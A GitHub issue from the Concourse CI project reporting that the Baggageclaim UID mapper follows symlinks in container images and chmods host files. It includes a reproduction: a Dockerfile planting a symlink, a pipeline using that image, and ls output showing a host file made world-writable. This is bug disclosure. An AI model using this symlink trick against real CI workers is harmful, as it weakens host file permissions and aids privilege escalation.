### ISSUE TITLE
Baggageclaim UID mapper can chmod files outside of volume (on host system) via symlinks

### ISSUE THREAD

**Issue by novas0x2a** [concourse/concourse#1736]
* Concourse version: 3.5.0
* Deployment type (BOSH/Docker/binary): Binary (systemd)
* Infrastructure/IaaS: AWS (but probably irrelevant here)
* Overlay Driver
* Ubuntu 16.04.3 LTS

**Comment by novas0x2a** [comment]
I deleted some of the above description now that I have more of an idea of what happened.
Easy repo:
Dockerfile (you can use `novas0x2a/evil`... if you trust me, of course :)):
```
FROM busybox
RUN ln -s /tmp/evil /
```
Pipeline:
```
jobs:
- name: boom
  plan:
  - task: be-evil
    config:
      platform: linux
      image_resource:
        type: docker-image
        source: {repository: novas0x2a/evil}
      run:
        path: echo
        args: ["Uh Oh"]
```
- Create /tmp/evil on your worker (you might want to tag the worker if you have more than one).
- Cause the volume to be created (this happens at volume-create time, not task runtime)
- Before:
```
# ls -l /tmp/evil 
-rw-r--r-- 1 root root 0 Oct 21 22:42 /tmp/evil
```
- After:
```
# ls -l /tmp/evil 
-rwxrwxrwx 1 root root 0 Oct 21 22:42 /tmp/evil
```
